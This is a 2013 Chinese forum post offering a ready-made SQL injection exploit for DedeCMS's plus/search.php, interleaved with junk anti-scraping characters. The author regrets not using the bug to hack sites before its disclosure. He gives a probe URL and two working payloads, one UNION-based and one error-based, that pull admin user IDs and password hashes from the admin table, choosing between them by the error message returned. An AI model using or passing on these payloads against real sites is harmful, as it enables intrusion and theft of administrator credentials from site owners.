转载不加作者名的没JJ
4 m* c! m. [5 d# I, ~9 Q
; r3 c8 j1 p0 y' W哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
/ d- m& d2 l& f$ Y7 p$ a$ E# l0 U2 Z* b: S) [. }5 }
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。( O$ {& b' x% ~6 v
0 }$ k; c& ~6 h
我一般是这样测试的:
. n, O8 A0 T1 O; L- s% b
% r. m" |$ G, M/ C7 {* q8 n& d9 W提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
/ }7 `/ v, e+ m0 J; A
p( O- J& z* u0 q' c# D) u9 P" X转载不加作者名的没JJ$ C* i, Z' G# \- w( e
8 o7 D( W* c2 H2 t
作者:鬼哥
" n: T9 V+ y9 l2 X* n- b. z! }
5 F( }# B& ^' a' t ' u r) `! c* f6 \
3 P6 p( p" X% t; |5 L) K
看结果如果提示) E7 D! B2 Z5 Y' x+ @3 q V
$ C+ ~" A% O! z1 bSafe Alert: Request Error step 2 !
; k7 H4 y% k2 G- a5 p6 p7 T0 g% R7 f
那么直接用下面的exp- ?$ H e( d' h: q2 r' K
( Z5 ?5 p8 y8 |% x/ Axx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a9 Y% g+ U0 f9 v4 @+ E3 Q
: z$ k* R- z4 Z' j: k7 K# L8 W; c7 D, j! T6 h
看结果如果提示
- J, ?* j" W; G5 `% M; I/ Y( Q6 ~( r- [
Safe Alert: Request Error step 1 !
1 ]- m# i1 ~* I. j/ a. S
, c2 c9 d g9 x那么直接用下面的exp" F! W5 w6 ]7 I+ g7 n* i3 R
7 ^9 V: l R. |- D
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
, X8 A/ T3 [* u+ w2 n. p7 w
. |: ^1 Z- a; |+ R6 f
: J @' z2 c% F/ q9 c2 C: y如果正常显示证明漏洞不存在了。
: P8 `: L: [% s ?
5 |; f9 a7 _0 u' o) E |5 }# B转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对